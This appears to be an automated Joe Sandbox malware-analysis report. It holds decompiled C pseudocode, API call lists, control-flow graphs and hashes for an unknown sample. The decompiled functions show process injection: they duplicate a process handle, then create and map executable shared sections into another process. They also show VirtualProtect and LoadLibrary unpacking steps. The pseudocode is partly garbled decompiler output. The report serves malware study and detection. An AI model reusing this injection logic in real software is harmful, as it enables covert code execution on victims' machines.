                                                                                                    				L004011F5(_t175, _t211);
                                                                                                    				_t126 =  *((intOrPtr*)(_t203 + 8));
                                                                                                    				_t176 = 0;
                                                                                                    				 *((intOrPtr*)(_t203 - 0x34)) = 0;
                                                                                                    				if(gs != 0) {
                                                                                                    					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
                                                                                                    				}
                                                                                                    				while(1) {
                                                                                                    					_t86 =  *((intOrPtr*)(_t126 + 0x48))();
                                                                                                    					if(_t86 != 0) {
                                                                                                    						break;
                                                                                                    					}
                                                                                                    					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
                                                                                                    				}
                                                                                                    				 *((intOrPtr*)(_t203 - 0x5c)) = _t86;
                                                                                                    				_t185 = _t203 - 0x60;
                                                                                                    				 *_t185 = _t176;
                                                                                                    				 *((intOrPtr*)(_t126 + 0x4c))(_t86, _t185);
                                                                                                    				_t89 =  *_t185;
                                                                                                    				if(_t89 != 0) {
                                                                                                    					_t132 = _t203 - 0x30;
                                                                                                    					 *_t132 = _t89;
                                                                                                    					 *(_t132 + 4) = _t176;
                                                                                                    					_t187 = _t203 - 0x28;
                                                                                                    					 *((intOrPtr*)(_t126 + 0x10))(_t187, 0x18);
                                                                                                    					 *_t187 = 0x18;
                                                                                                    					_push(_t203 - 0x30);
                                                                                                    					_push(_t187);
                                                                                                    					_push(0x40);
                                                                                                    					_push(_t203 - 0x10);
                                                                                                    					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t176, _t176, 2) == 0) {
                                                                                                    						 *(_t203 - 8) = _t176;
                                                                                                    						_t96 = _t203 - 0x50;
                                                                                                    						 *(_t96 + 4) = _t176;
                                                                                                    						 *_t96 = 0x5000;
                                                                                                    						_t188 = _t203 - 0x54;
                                                                                                    						if(NtCreateSection(_t188, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
                                                                                                    							 *_t25 =  *(_t203 - 0x50);
                                                                                                    							_t120 = _t203 - 0x44;
                                                                                                    							 *_t120 = _t176;
                                                                                                    							if(NtMapViewOfSection( *_t188, 0xffffffff, _t120, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
                                                                                                    								_t122 = _t203 - 0x3c;
                                                                                                    								 *_t122 = _t176;
                                                                                                    								if(NtMapViewOfSection( *_t188,  *(_t203 - 0xc), _t122, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
                                                                                                    									_t202 =  *(_t203 - 0x44);
                                                                                                    									 *((intOrPtr*)(_t126 + 0x20))(_t176, _t202, 0x104);
                                                                                                    									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
                                                                                                    									 *(_t203 - 8) =  *(_t203 - 8) + 1;
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    						_t98 = _t203 - 0x50;
                                                                                                    						 *(_t98 + 4) = _t176;
                                                                                                    						 *_t98 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
                                                                                                    						_t189 = _t203 - 0x58;
                                                                                                    						_t99 = NtCreateSection(_t189, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
                                                                                                    						if (_t99 != 0) goto L64;
                                                                                                    						 *_t99 =  *_t99 + _t99;
                                                                                                    					}
                                                                                                    				}
                                                                                                    				_push(0x15a4);
                                                                                                    				_t90 =  *_t206;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t176, _t232);
                                                                                                    				return _t90;
                                                                                                    			}
























                                                                                                    0x00401578
                                                                                                    0x00401580
                                                                                                    0x00401592
                                                                                                    0x0040159f
                                                                                                    0x004015a4
                                                                                                    0x004015a7
                                                                                                    0x004015a9
                                                                                                    0x004015b2
                                                                                                    0x004015b4
                                                                                                    0x004015b4
                                                                                                    0x004015b7
                                                                                                    0x004015b7
                                                                                                    0x004015bc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004018dc
                                                                                                    0x004018dc
                                                                                                    0x004015c2
                                                                                                    0x004015c5
                                                                                                    0x004015c8
                                                                                                    0x004015cc
                                                                                                    0x004015cf
                                                                                                    0x004015d3
                                                                                                    0x004015d9
                                                                                                    0x004015dc
                                                                                                    0x004015de
                                                                                                    0x004015e1
                                                                                                    0x004015e7
                                                                                                    0x004015ea
                                                                                                    0x004015f8
                                                                                                    0x004015f9
                                                                                                    0x004015fa
                                                                                                    0x004015fc
                                                                                                    0x00401602
                                                                                                    0x00401625
                                                                                                    0x00401628
                                                                                                    0x0040162b
                                                                                                    0x0040162e
                                                                                                    0x00401634
                                                                                                    0x00401649
                                                                                                    0x0040164e
                                                                                                    0x00401651
                                                                                                    0x00401654
                                                                                                    0x0040166c
                                                                                                    0x0040166e
                                                                                                    0x00401671
                                                                                                    0x0040168a
                                                                                                    0x0040168c
                                                                                                    0x00401696
                                                                                                    0x0040169c
                                                                                                    0x004016a2
                                                                                                    0x004016a2
                                                                                                    0x0040168a
                                                                                                    0x0040166c
                                                                                                    0x004016a5
                                                                                                    0x004016b1
                                                                                                    0x004016b4
                                                                                                    0x004016b6
                                                                                                    0x004016c6
                                                                                                    0x004016cb
                                                                                                    0x004016cf
                                                                                                    0x004016cf
                                                                                                    0x00401602
                                                                                                    0x004018ea
                                                                                                    0x004018ef
                                                                                                    0x00401914
                                                                                                    0x00401926
                                                                                                    0x0040192f

                                                                                                    APIs
                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.569022224.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 1546783058-0
                                                                                                    • Opcode ID: 23d6bc309405edc7f8da1be2c541e8d9f5b1e81b56b2c35d9e42197813f8af09
                                                                                                    • Instruction ID: 9d9f292dd7e40d4d2d6115b75542e29ae97a3c703512c5fffb38717ec82669a3
                                                                                                    • Opcode Fuzzy Hash: 23d6bc309405edc7f8da1be2c541e8d9f5b1e81b56b2c35d9e42197813f8af09
                                                                                                    • Instruction Fuzzy Hash: 36511A75900249BFEB209F91CC48FAF7BB8FF85B14F10416AFA11BA1A5D6749941CB24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 267 40159a-4015b2 call 4011f5 271 4015b4 267->271 272 4015b7-4015bc 267->272 271->272 274 4015c2-4015d3 272->274 275 4018d7-4018df 272->275 279 4018d5 274->279 280 4015d9-401602 274->280 275->272 278 4018e4-40192f call 4011f5 275->278 279->278 280->279 287 401608-40161f NtDuplicateObject 280->287 287->279 289 401625-401649 NtCreateSection 287->289 291 4016a5-4016cb NtCreateSection 289->291 292 40164b-40166c NtMapViewOfSection 289->292 291->279 296 4016d1-4016d5 291->296 292->291 295 40166e-40168a NtMapViewOfSection 292->295 295->291 298 40168c-4016a2 295->298 296->279 299 4016db-4016fc NtMapViewOfSection 296->299 298->291 299->279 301 401702-40171e NtMapViewOfSection 299->301 301->279 304 401724-40174c call 401729 301->304 304->279 304->299
                                                                                                    C-Code - Quality: 84%
                                                                                                    			E0040159A() {
                                                                                                    				intOrPtr _t86;
                                                                                                    				struct _EXCEPTION_RECORD _t89;
                                                                                                    				intOrPtr _t90;
                                                                                                    				struct _GUID _t96;
                                                                                                    				struct _GUID _t98;
                                                                                                    				long _t99;
                                                                                                    				PVOID* _t120;
                                                                                                    				PVOID* _t122;
                                                                                                    				intOrPtr _t127;
                                                                                                    				struct _EXCEPTION_RECORD* _t132;
                                                                                                    				void* _t175;
                                                                                                    				struct _EXCEPTION_RECORD _t176;
                                                                                                    				struct _EXCEPTION_RECORD* _t184;
                                                                                                    				intOrPtr* _t186;
                                                                                                    				HANDLE* _t187;
                                                                                                    				HANDLE* _t188;
                                                                                                    				void* _t201;
                                                                                                    				void* _t202;
                                                                                                    				intOrPtr* _t204;
                                                                                                    				void* _t209;
                                                                                                    
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t175, _t209);
                                                                                                    				_t127 =  *((intOrPtr*)(_t202 + 8));
                                                                                                    				_t176 = 0;
                                                                                                    				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                                                                                                    				if(gs != 0) {
                                                                                                    					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                                                                                                    				}
                                                                                                    				while(1) {
                                                                                                    					_t86 =  *((intOrPtr*)(_t127 + 0x48))();
                                                                                                    					if(_t86 != 0) {
                                                                                                    						break;
                                                                                                    					}
                                                                                                    					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
                                                                                                    				}
                                                                                                    				 *((intOrPtr*)(_t202 - 0x5c)) = _t86;
                                                                                                    				_t184 = _t202 - 0x60;
                                                                                                    				 *_t184 = _t176;
                                                                                                    				 *((intOrPtr*)(_t127 + 0x4c))(_t86, _t184);
                                                                                                    				_t89 =  *_t184;
                                                                                                    				if(_t89 != 0) {
                                                                                                    					_t132 = _t202 - 0x30;
                                                                                                    					 *_t132 = _t89;
                                                                                                    					 *(_t132 + 4) = _t176;
                                                                                                    					_t186 = _t202 - 0x28;
                                                                                                    					 *((intOrPtr*)(_t127 + 0x10))(_t186, 0x18);
                                                                                                    					 *_t186 = 0x18;
                                                                                                    					_push(_t202 - 0x30);
                                                                                                    					_push(_t186);
                                                                                                    					_push(0x40);
                                                                                                    					_push(_t202 - 0x10);
                                                                                                    					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t176, _t176, 2) == 0) {
                                                                                                    						 *(_t202 - 8) = _t176;
                                                                                                    						_t96 = _t202 - 0x50;
                                                                                                    						 *(_t96 + 4) = _t176;
                                                                                                    						 *_t96 = 0x5000;
                                                                                                    						_t187 = _t202 - 0x54;
                                                                                                    						if(NtCreateSection(_t187, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
                                                                                                    							 *_t25 =  *(_t202 - 0x50);
                                                                                                    							_t120 = _t202 - 0x44;
                                                                                                    							 *_t120 = _t176;
                                                                                                    							if(NtMapViewOfSection( *_t187, 0xffffffff, _t120, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
                                                                                                    								_t122 = _t202 - 0x3c;
                                                                                                    								 *_t122 = _t176;
                                                                                                    								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t122, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
                                                                                                    									_t201 =  *(_t202 - 0x44);
                                                                                                    									 *((intOrPtr*)(_t127 + 0x20))(_t176, _t201, 0x104);
                                                                                                    									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                                                                                                    									 *(_t202 - 8) =  *(_t202 - 8) + 1;
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    						_t98 = _t202 - 0x50;
                                                                                                    						 *(_t98 + 4) = _t176;
                                                                                                    						 *_t98 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                                                                                                    						_t188 = _t202 - 0x58;
                                                                                                    						_t99 = NtCreateSection(_t188, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
                                                                                                    						if (_t99 != 0) goto L61;
                                                                                                    						 *_t99 =  *_t99 + _t99;
                                                                                                    					}
                                                                                                    				}
                                                                                                    				_push(0x15a4);
                                                                                                    				_t90 =  *_t204;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t176, _t230);
                                                                                                    				return _t90;
                                                                                                    			}























                                                                                                    0x00401592
                                                                                                    0x0040159f
                                                                                                    0x004015a4
                                                                                                    0x004015a7
                                                                                                    0x004015a9
                                                                                                    0x004015b2
                                                                                                    0x004015b4
                                                                                                    0x004015b4
                                                                                                    0x004015b7
                                                                                                    0x004015b7
                                                                                                    0x004015bc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004018dc
                                                                                                    0x004018dc
                                                                                                    0x004015c2
                                                                                                    0x004015c5
                                                                                                    0x004015c8
                                                                                                    0x004015cc
                                                                                                    0x004015cf
                                                                                                    0x004015d3
                                                                                                    0x004015d9
                                                                                                    0x004015dc
                                                                                                    0x004015de
                                                                                                    0x004015e1
                                                                                                    0x004015e7
                                                                                                    0x004015ea
                                                                                                    0x004015f8
                                                                                                    0x004015f9
                                                                                                    0x004015fa
                                                                                                    0x004015fc
                                                                                                    0x00401602
                                                                                                    0x00401625
                                                                                                    0x00401628
                                                                                                    0x0040162b
                                                                                                    0x0040162e
                                                                                                    0x00401634
                                                                                                    0x00401649
                                                                                                    0x0040164e
                                                                                                    0x00401651
                                                                                                    0x00401654
                                                                                                    0x0040166c
                                                                                                    0x0040166e
                                                                                                    0x00401671
                                                                                                    0x0040168a
                                                                                                    0x0040168c
                                                                                                    0x00401696
                                                                                                    0x0040169c
                                                                                                    0x004016a2
                                                                                                    0x004016a2
                                                                                                    0x0040168a
                                                                                                    0x0040166c
                                                                                                    0x004016a5
                                                                                                    0x004016b1
                                                                                                    0x004016b4
                                                                                                    0x004016b6
                                                                                                    0x004016c6
                                                                                                    0x004016cb
                                                                                                    0x004016cf
                                                                                                    0x004016cf
                                                                                                    0x00401602
                                                                                                    0x004018ea
                                                                                                    0x004018ef
                                                                                                    0x00401914
                                                                                                    0x00401926
                                                                                                    0x0040192f

                                                                                                    APIs
                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.569022224.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 1546783058-0
                                                                                                    • Opcode ID: 4dff7dc5d51454a43d874152b5abf798c4daef4429b50565c24c7d2891ff9f85
                                                                                                    • Instruction ID: 1cd82c906aaffff485458f801d6ba595cb0416390f7e33d4f9d681d8d529f326
                                                                                                    • Opcode Fuzzy Hash: 4dff7dc5d51454a43d874152b5abf798c4daef4429b50565c24c7d2891ff9f85
                                                                                                    • Instruction Fuzzy Hash: BF510971900249BFEB209F92CC48F9FBBB8FF85B14F104159FA11AA2A5D6749940CB24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 308 401749-40174c 310 4018d5-40192f call 4011f5 308->310 311 4016db-4016fc NtMapViewOfSection 308->311 311->310 313 401702-40171e NtMapViewOfSection 311->313 313->310 315 401724 call 401729 313->315 315->308
                                                                                                    APIs
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.569022224.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: SectionView
                                                                                                    • String ID:
                                                                                                    • API String ID: 1323581903-0
                                                                                                    • Opcode ID: 645c41685cf09351304fde75ab205f83a01d627caff4926b51e1c70b330bbf47
                                                                                                    • Instruction ID: 088a864a315bec2a81033f27f4cad91d314b4a72151043dcf738e9c9ac7e5ebb
                                                                                                    • Opcode Fuzzy Hash: 645c41685cf09351304fde75ab205f83a01d627caff4926b51e1c70b330bbf47
                                                                                                    • Instruction Fuzzy Hash: 0E011475500288FEEB219F92CC49FAF7FB9EF82B10F08016AF510B61E5E2714980CB20
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 327 40f520-40f556 call 40c7f0 330 40f558-40f55e 327->330 331 40f560 330->331 332 40f566-40f56c 330->332 331->332 333 40f57e-40f585 332->333 334 40f56e-40f574 332->334 333->330 336 40f587-40f591 333->336 334->333 335 40f576-40f57c 334->335 335->333 335->336 337 40f597-40f62c 336->337 338 40f6bb-40f6fe GlobalAlloc 336->338 374 40f63b-40f63f 337->374 375 40f62e-40f638 337->375 339 40f700-40f703 338->339 340 40f714-40f719 339->340 341 40f705-40f70f 339->341 343 40f855-40f859 340->343 344 40f71f-40f850 340->344 341->340 343->339 346 40f85f-40f863 343->346 344->343 349 40f874-40f879 346->349 350 40f865-40f872 call 40f230 346->350 352 40f915-40f930 call 40f180 call 40f4f0 call 40f330 349->352 353 40f87f-40f90d 349->353 350->349 370 40f935-40f93f 352->370 353->352 371 40f981-40f998 370->371 372 40f941-40f979 370->372 372->371 377 40f641-40f64b 374->377 378 40f64e-40f698 374->378 375->374 377->378 401 40f6b9 378->401 402 40f69a-40f6a2 378->402 401->338 405 40f6b0-40f6b6 402->405 406 40f6a4-40f6ae 402->406 405->401 406->405
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNELBASE(00000000,01B26FA4), ref: 0040F6CE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.569154010.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocGlobal
                                                                                                    • String ID:
                                                                                                    • API String ID: 3761449716-0
                                                                                                    • Opcode ID: fc3fe15670ad445a81a0a1c59a104890bd50abbac8f9e8819835a8cdc4caf0ec
                                                                                                    • Instruction ID: 0c1a56b8fe9fcce86bef0367314132a34f7c135904c846998f942d3fcff263de
                                                                                                    • Opcode Fuzzy Hash: fc3fe15670ad445a81a0a1c59a104890bd50abbac8f9e8819835a8cdc4caf0ec
                                                                                                    • Instruction Fuzzy Hash: 78C10C71644340AFE370AFA0DD4AF9A77A4AB44B06F10053EF789BA5E0CBB45444CB6E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 424 40f180-40f21c VirtualProtect
                                                                                                    APIs
                                                                                                    • VirtualProtect.KERNELBASE(01B21D6C,01B26FA4,00000040,?,?,0040F921), ref: 0040F218
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.569154010.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProtectVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 544645111-0
                                                                                                    • Opcode ID: 419d65351ee2ee0090a9c9ac0f4a08d0769de6d65bf08936b598afe5cede4f7e
                                                                                                    • Instruction ID: 33c8d40dc3e6cc9a83b9db5c10a78fb5b0d9e280a45d1d5360d6ad10d4a1305f
                                                                                                    • Opcode Fuzzy Hash: 419d65351ee2ee0090a9c9ac0f4a08d0769de6d65bf08936b598afe5cede4f7e
                                                                                                    • Instruction Fuzzy Hash: 1201E8F020A340DED331CF66FE85B517B65A755721F90512DE149873B4D7744886CB2D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 427 40f330-40f361 LoadLibraryA
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNELBASE(00429938,0040F935), ref: 0040F35B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.569154010.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: e31a23daf31a734ca8eb984a86a88a8ca709d9e9bff161ad91de18902ab3d715
                                                                                                    • Instruction ID: cc85038d26f41e392b25cc775a989e1a0df30f8392305f89cd9ee0120de5ca4d
                                                                                                    • Opcode Fuzzy Hash: e31a23daf31a734ca8eb984a86a88a8ca709d9e9bff161ad91de18902ab3d715
                                                                                                    • Instruction Fuzzy Hash: 91C002E0652200CACB208F51A98AB58BB74BA00731FE0502C95945A731D77009C7CB1E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 468 401932-40197e 476 401981-4019a3 call 4011f5 Sleep call 401467 468->476 477 40196f-40197a 468->477 482 4019b2-4019f7 call 4011f5 476->482 483 4019a5-4019ad call 401558 476->483 477->476 483->482
                                                                                                    C-Code - Quality: 22%
                                                                                                    			E00401932(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                    				char _v8;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* _t10;
                                                                                                    				void* _t12;
                                                                                                    				intOrPtr* _t14;
                                                                                                    				void* _t19;
                                                                                                    				void* _t20;
                                                                                                    
                                                                                                    				_push(0x1986);
                                                                                                    				_push(0x6d);
                                                                                                    				_push(0xc5);
                                                                                                    				L004011F5(_t19, __eflags);
                                                                                                    				_t14 = _a4;
                                                                                                    				Sleep(0x1388);
                                                                                                    				_push( &_v8);
                                                                                                    				_push(_a12);
                                                                                                    				_push(_a8);
                                                                                                    				_push(_t14); // executed
                                                                                                    				_t10 = L00401467(_t19, _t20); // executed
                                                                                                    				_t26 = _t10;
                                                                                                    				if(_t10 != 0) {
                                                                                                    					E00401558(_t14, _t10, _v8, _a16); // executed
                                                                                                    				}
                                                                                                    				 *_t14(0xffffffff, 0);
                                                                                                    				_t12 = 0x1986;
                                                                                                    				_push(0x6d);
                                                                                                    				_push(0xc5);
                                                                                                    				L004011F5(_t19, _t26);
                                                                                                    				return _t12;
                                                                                                    			}











                                                                                                    0x00401943
                                                                                                    0x0040195b
                                                                                                    0x0040196f
                                                                                                    0x00401981
                                                                                                    0x00401986
                                                                                                    0x0040198e
                                                                                                    0x00401994
                                                                                                    0x00401995
                                                                                                    0x00401998
                                                                                                    0x0040199b
                                                                                                    0x0040199c
                                                                                                    0x004019a1
                                                                                                    0x004019a3
                                                                                                    0x004019ad
                                                                                                    0x004019ad
                                                                                                    0x004019b6
                                                                                                    0x004019c2
                                                                                                    0x004019cf
                                                                                                    0x004019e1
                                                                                                    0x004019ee
                                                                                                    0x004019f7

                                                                                                    APIs
                                                                                                    • Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E
                                                                                                      • Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                      • Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.569022224.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 4152845823-0
                                                                                                    • Opcode ID: 3fc1ef90b2a5b2730ee9b434eeb4b582bf46cdcd1d0460405fd1be13f8c58862
                                                                                                    • Instruction ID: f289286abcb0c8361d5bc883c0512fb430ce21eb2a0d87beead029bdd4c1ea53
                                                                                                    • Opcode Fuzzy Hash: 3fc1ef90b2a5b2730ee9b434eeb4b582bf46cdcd1d0460405fd1be13f8c58862
                                                                                                    • Instruction Fuzzy Hash: 6C11C2F1208204F7E7006A959D62E7A3669AB01714F304137BA43790F1D57D9913E76F
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 497 40193d-40197e 500 401981-4019a3 call 4011f5 Sleep call 401467 497->500 501 40196f-40197a 497->501 506 4019b2-4019f7 call 4011f5 500->506 507 4019a5-4019ad call 401558 500->507 501->500 507->506
                                                                                                    C-Code - Quality: 29%
                                                                                                    			E0040193D(void* __eax, signed int __ecx, void* __edx, void* __edi, void* __esi) {
                                                                                                    				void* _t14;
                                                                                                    				void* _t16;
                                                                                                    				intOrPtr* _t18;
                                                                                                    				void* _t30;
                                                                                                    				signed int _t38;
                                                                                                    
                                                                                                    				_t26 = __edi;
                                                                                                    				asm("in eax, 0x45");
                                                                                                    				_t2 = __eax - 0x7a;
                                                                                                    				 *_t2 =  *(__eax - 0x7a) | __ecx;
                                                                                                    				_t38 =  *_t2;
                                                                                                    				_push(0x1986);
                                                                                                    				_push(0x6d);
                                                                                                    				_push(0xc5);
                                                                                                    				L004011F5(__edi, _t38);
                                                                                                    				_t18 =  *((intOrPtr*)(_t30 + 8));
                                                                                                    				Sleep(0x1388);
                                                                                                    				_push(_t30 - 4);
                                                                                                    				_push( *((intOrPtr*)(_t30 + 0x10)));
                                                                                                    				_push( *((intOrPtr*)(_t30 + 0xc)));
                                                                                                    				_push(_t18); // executed
                                                                                                    				_t14 = L00401467(__edi, __esi); // executed
                                                                                                    				_t39 = _t14;
                                                                                                    				if(_t14 != 0) {
                                                                                                    					E00401558(_t18, _t14,  *((intOrPtr*)(_t30 - 4)),  *((intOrPtr*)(_t30 + 0x14))); // executed
                                                                                                    				}
                                                                                                    				 *_t18(0xffffffff, 0);
                                                                                                    				_t16 = 0x1986;
                                                                                                    				_push(0x6d);
                                                                                                    				_push(0xc5);
                                                                                                    				L004011F5(_t26, _t39);
                                                                                                    				return _t16;
                                                                                                    			}








                                                                                                    0x0040193d
                                                                                                    0x00401940
                                                                                                    0x00401942
                                                                                                    0x00401942
                                                                                                    0x00401942
                                                                                                    0x00401943
                                                                                                    0x0040195b
                                                                                                    0x0040196f
                                                                                                    0x00401981
                                                                                                    0x00401986
                                                                                                    0x0040198e
                                                                                                    0x00401994
                                                                                                    0x00401995
                                                                                                    0x00401998
                                                                                                    0x0040199b
                                                                                                    0x0040199c
                                                                                                    0x004019a1
                                                                                                    0x004019a3
                                                                                                    0x004019ad
                                                                                                    0x004019ad
                                                                                                    0x004019b6
                                                                                                    0x004019c2
                                                                                                    0x004019cf
                                                                                                    0x004019e1
                                                                                                    0x004019ee
                                                                                                    0x004019f7

                                                                                                    APIs
                                                                                                    • Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E
                                                                                                      • Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                      • Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.569022224.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
